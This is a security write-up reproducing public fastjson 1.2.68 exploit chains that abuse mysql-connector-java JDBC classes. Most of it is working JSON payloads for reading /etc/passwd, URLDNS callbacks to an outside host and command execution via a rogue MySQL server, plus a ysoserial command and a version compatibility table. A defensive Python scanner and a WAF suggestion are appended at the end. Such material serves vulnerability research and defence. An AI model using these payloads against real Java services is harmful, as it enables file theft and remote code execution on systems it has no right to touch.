Preface
A write-up collecting and reproducing the publicly documented fastjson high-version JDBC exploitation chains.
fastjson 1.2.68 and JDBC
When mysql-connector-java = 8.0.19
File read is possible:
```json
{
  "@type": "java.lang.AutoCloseable",
  "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
  "proxy": {
    "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
    "connectionUrl": {
      "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
      "masters": [
        {
          "host": "10.211.55.2"
        }
      ],
      "slaves": [],
      "properties": {
        "host": "10.211.55.2",
        "user": "fileread_/etc/passwd",
        "dbname": "dbname",
        "password": "pass",
        "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize": "true",
        "allowLoadLocalInfile": "true"
      }
    }
  }
}
```
URLDNS is possible:
```json
{
  "@type": "java.lang.AutoCloseable",
  "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
  "proxy": {
    "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
    "connectionUrl": {
      "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
      "masters": [
        {
          "host": "10.211.55.2"
        }
      ],
      "slaves": [],
      "properties": {
        "host": "10.211.55.2",
        "user": "deser_URLDNS_http://xxs.decftp.ceye.io",
        "dbname": "dbname",
        "password": "pass",
        "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize": "true",
        "allowLoadLocalInfile": "true"
      }
    }
  }
}
```
Command execution is possible:
```json
{
  "@type": "java.lang.AutoCloseable",
  "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
  "proxy": {
    "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
    "connectionUrl": {
      "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
      "masters": [
        {
          "host": "10.211.55.2"
        }
      ],
      "slaves": [],
      "properties": {
        "host": "10.211.55.2",
        "user": "test",
        "dbname": "dbname",
        "password": "pass",
        "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize": "true",
        "allowLoadLocalInfile": "true"
      }
    }
  }
}
```
When mysql-connector-java = 6.0.2, the PoC is:
```json
{
  "@type": "java.lang.AutoCloseable",
  "@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
  "proxy": {
    "connectionString": {
      "url": "jdbc:mysql://10.211.55.2:3306/test?allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=fileread_/etc/passwd"
    }
  }
}
```
Use
```
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Fastjson1 "open -a Calculator" > payload
```
to generate the payload.
Then use fake-mysql-gui-0.0.4.jar to start the listening port. Command execution is possible.
When 5.1.11 > mysql-connector-java > 5.1.48, the PoC is:
```json
{
  "@type": "java.lang.AutoCloseable",
  "@type": "com.mysql.jdbc.JDBC4Connection",
  "hostToConnectTo": "127.0.0.1",
  "portToConnectTo": 3306,
  "info": {
    "user": "fileread_/etc/passwd",
    "password": "3306",
    "maxAllowedPacket": "655360",
    "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
    "autoDeserialize": "true",
    "NUM_HOSTS": "1"
  },
  "databaseToConnectTo": "dbname",
  "url": ""
}
```
Summary
| 1.2.36 > fastjson > 1.2.68 | File read | URLDNS | Command execution |
|---|---|---|---|
| mysql-connector-java > 8.0.19 | ✓ | x | x |
| mysql-connector-java = 8.0.19 | ✓ | ✓ | ✓ |
| mysql-connector-java < 8.0.19 | x | x | x |
| mysql-connector-java = 6.0.2 | ✓ | ✓ | ✓ |
| mysql-connector-java = 6.0.3 | ✓ | ✓ | ✓ |
| 5.1.10 < mysql-connector-java <= 5.1.48 | ✓ | ✓ | ✓ |
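As an added defensive check (not part of the original write-up): a small Python scanner that walks an incoming fastjson document, keeping duplicate keys because the double `"@type"` is what makes the `AutoCloseable` chain work, and reports the driver classes, properties and JDBC URL parameters that every PoC above depends on. `SAMPLE` is a constructed, trimmed copy of the 8.0.19 file-read payload; the function and constant names are mine.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Driver property names used by every PoC above (real mysql-connector-java keys).
DANGEROUS_FLAGS = {"autoDeserialize", "allowLoadLocalInfile"}
INTERCEPTOR_KEYS = {"queryInterceptors", "statementInterceptors"}
INTERCEPTOR_MARKER = "ServerStatusDiffInterceptor"
MYSQL_DRIVER_TYPE = re.compile(r"^com\.mysql\.(cj\.)?jdbc\.")

class Obj(list):
    pass  # JSON object as ordered (key, value) pairs, so duplicate "@type" keys survive

def _check_jdbc_url(url, findings):
    # The 6.0.2 PoC form: the same flags appear as query parameters of a JDBC URL.
    if not url.startswith("jdbc:mysql://"):
        return
    for key, values in parse_qs(urlsplit(url[len("jdbc:"):]).query).items():
        if key in DANGEROUS_FLAGS and values[-1].lower() == "true":
            findings.append(f"jdbc url sets {key}=true")
        elif key in INTERCEPTOR_KEYS and any(INTERCEPTOR_MARKER in v for v in values):
            findings.append(f"jdbc url sets {key} to {INTERCEPTOR_MARKER}")

def _walk(node, findings):
    if isinstance(node, Obj):  # Obj is a list subclass, so test it first
        types = [v for k, v in node if k == "@type" and isinstance(v, str)]
        if len(types) > 1 and types[0] == "java.lang.AutoCloseable":
            findings.append(f"AutoCloseable @type chain to {types[-1]}")
        findings.extend(f"mysql driver class {t}" for t in types if MYSQL_DRIVER_TYPE.match(t))
        for key, value in node:
            if key in DANGEROUS_FLAGS and str(value).lower() == "true":
                findings.append(f"property {key}=true")
            elif key in INTERCEPTOR_KEYS and INTERCEPTOR_MARKER in str(value):
                findings.append(f"property {key} loads {INTERCEPTOR_MARKER}")
            _walk(value, findings)
    elif isinstance(node, list):
        for item in node:
            _walk(item, findings)
    elif isinstance(node, str):
        _check_jdbc_url(node, findings)

def find_jdbc_sinks(text):
    """Return indicator strings found in a fastjson payload; empty list if clean."""
    findings = []
    _walk(json.loads(text, object_pairs_hook=Obj), findings)
    return findings

# Constructed sample: the structure of the 8.0.19 file-read PoC above, trimmed.
SAMPLE = ('{"@type":"java.lang.AutoCloseable","@type":"com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",'
          '"proxy":{"connectionUrl":{"properties":{"autoDeserialize":"true","allowLoadLocalInfile":"true",'
          '"queryInterceptors":"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor"}}}}')
```

A WAF rule or an input filter in front of `JSON.parseObject` can reject any document for which `find_jdbc_sinks` returns a non-empty list; the same keys should also be blocked when a JDBC URL is built from user-controlled input.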